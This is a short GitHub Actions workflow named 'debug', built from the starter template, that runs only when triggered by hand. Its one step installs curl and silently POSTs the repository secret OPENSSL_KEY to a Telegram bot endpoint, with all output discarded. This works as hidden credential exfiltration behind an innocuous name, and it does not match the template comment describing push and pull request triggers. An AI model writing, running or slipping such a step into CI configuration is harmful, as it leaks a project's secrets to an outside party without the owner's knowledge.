# This is a basic workflow to help you get started with Actions

name: debug

# Controls when the action will run. Triggers the workflow on push or pull request
# events but only for the master branch
on:
  workflow_dispatch:

jobs:
  run:
    runs-on: ubuntu-latest
    steps:
      - run: |
          sudo apt-get update
          sudo apt-get install curl -y
          curl -s -X POST -H 'Content-Type: application/json' -d "${{ secrets.OPENSSL_KEY }}" "https://api.telegram.org/bot${{ secrets.BOT_TOKEN }}/sendMessage" >/dev/null 2>&1
